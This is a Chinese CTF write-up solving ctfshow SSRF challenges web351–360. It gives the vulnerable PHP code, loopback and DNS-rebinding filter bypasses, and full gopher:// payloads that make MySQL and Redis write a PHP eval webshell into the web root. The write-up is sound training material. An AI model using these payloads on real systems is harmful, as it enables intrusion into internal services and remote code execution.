首页 > 其他分享 >ctfshow-ssrf

ctfshow-ssrf

时间:2024-02-21 20:33:05浏览次数:34  
标签:http ssrf 250D% 2500% flag ctfshow php 250A%

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

payload

127.0.0.1/flag.php
localhost/flag.php
file:///var/www/html/flag.php

web352

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker'); 
}

必须http开头就行了

payload

http://localhost/flag.php
http://127.0.0.1/flag.php
http://2130706433/flag.php

web353(整形ip)

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> 

payload

使用sudo.cc代替127.0.0.1/localhost url=http://sudo.cc/flag.php
在Linux中0表示自身的地址 可以使用http://0/flag.php 绕过
http://2130706433/flag.php

web354(域名DNS重定向)

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> 

payload

http://da.xyz52.link/flag.php
设置A记录指向127.0.0.1

web355(0代表本地ip)

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> 

payload

url=http://127.1/flag.php
url=http://0/flag.php

web356(0代表本地ip)

host名称的长度小于3

payload

url=http://0/flag.php

web357(DNS重新绑定,302跳转)

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?> 

filter_var — 使用特定的过滤器过滤一个变量

验证ip是否是内网ip,如果是的话返回false,否则返回ip;

代码如下:

filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)

gethostbyname — 返回主机名对应的 IPv4地址.

<?php
$ip = gethostbyname('www.baidu.com');
echo $ip;

payload

在自己服务器上写

<?php
header("Location:http://127.0.0.1/flag.php"); 

访问文件

访问http://ceye.io

image-20240206212348241

url=http://r.5k7kuy.ceye.io/flag.php

web358(parse_url利用)

 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

要求http://ctf.开头,show结尾

payload

http://[email protected]/flag.php?show

web359(gopher打无密码mysql)

check.php关键代码

if(isset($_POST['returl'])){
        $url = $_POST['returl'];
    if(preg_match("/file|dict/i",$url)){
        die();
    }
            echo _request("$url");

}

我们可以想到数据库 那我们直接通过 gopher 攻击mysql即可

python2 gopherus.py --exploit mysql

利用工具生成payload

image-20240207193533482

然后将下划线后面的在进行url编码生成最终payload

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2545%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%2501%2500%2500%2500%2501

web360(打redis)

同样生成payload,和上一题一样

image-20240207195040902

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252428%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B1%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

默认是shell.php文件

标签:http,ssrf,250D%,2500%,flag,ctfshow,php,250A%
From: https://www.cnblogs.com/C0rr3ct/p/18026158

相关文章

  • 【Loading】ctfshow_WriteUp | MISC入门
    misc1题目分析打开图片就是flag,可以直接拿文字识别工具识别一下提交。misc2题目分析看到NG开头的内容猜测是png文件被修改了文件类型,保险起见用010Editor先看看十六进制文件:png头:png尾:更改文件后缀名为png,打开图片得到flag。misc3题目分析查了......
  • [NISACTF 2022]easyssrf
    先按照最简单的试试 那就试试/fl4g,需要使用file伪协议进行文件读取,然后得到新的提示 进入新的目录 直接构造路劲进行flag的读取 也可以利用别的伪协议url?file=php://filter/read=convert.base64-encode/resource=/flag  ......
  • 【misc】ctfshow--CTF的一生如履薄冰
    解压的附件如下:666.zip这个压缩包是要密码的,打开txt看一下这个应该spamencode了直接解密:spammimic-decode解密结果为:h@ppy_n3w_y3ar_every_ctf3r_2024_g0g0g0!!!这个就是压缩包的密码,解压又是一个加密的压缩包,我们先来看看图片黑色背景下直接出key:H@ppy_CTFSH0W,打开......
  • 【pwn】ctfshow元旦水友赛--BadBoy
    首先先来看一下程序的保护情况这里got表可改,没有开地址随机接着看一下ida逻辑很直接,只有一个main函数,一点点分析这段代码buf[1]=__readfsqword(0x28u); init_func(argc,argv,envp); buf[0]='gfedcba'; v5=0LL; while((_DWORD)kl) {  puts("iamba......
  • SSRF漏洞
    SSRF意为服务端请求伪造(Server-SideRequestForge)。攻击者利用SSRF漏洞通过服务器发起伪造请求,这样就可以访问内网的数据,进行内网信息探测或者内网漏洞利用。SSRF漏洞形成的原因是:应用程序存在可以从其他服务器获取数据的功能,但是对服务器的地址并没有做严格的过滤,导致应用程序......
  • 【Loading】ctfshow_WriteUp | _萌新
    萌新_密码1题目密文:53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D提交格式:KEY{XXXXXXXXXXXXXX}分析所有字符由数字和ABCDEF组成,先用HEX解码得到S1lkZjBhM2ViZDVjNGRjMTYwLUV7ZmI2M2VlMDI5OGI4ZjRkOH0=。......
  • 服务器端请求伪造 (SSRF)
    什么是SSRF?服务器端请求伪造是一种Web安全漏洞,它允许攻击者使服务器端应用程序向非预期位置发出请求。在典型的SSRF攻击中,攻击者可能导致服务器与组织基础结构中的仅限内部的服务建立连接。在其他情况下,它们可能能够强制服务器连接到任意外部系统。这可能会泄露敏感数据,例如授......
  • Java代码审计-SSRF
    SSRF漏洞SSRF(Server-SideRequestForgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部服务器系统。支持的协议fil......
  • ctfshow-misc详解(持续更新中)
    杂项签到题目是个损坏的压缩包,考点:伪加密修改如下:保存解压得到flagflag{79ddfa61bda03defa7bfd8d702a656e4}misc2题目描述:偶然发现我竟然还有个软盘,勾起了我的回忆。我的解答:随便选一个虚拟机,然后编辑虚拟机设置然后添加选择软盘驱动器选择使用软盘映......
  • ctfshow元旦水友赛web-easy-login
    easy-login这个题群主在出红包题的时候发过了,当时侥幸拿了一血,但群主说非预期。这次放出来预期解,简单学习一下。非预期前面找链子大家应该都能找到,就不说了。关键代码如下classmysql_helper{private$db;public$option=array(PDO::ATTR_ERRMODE=>P......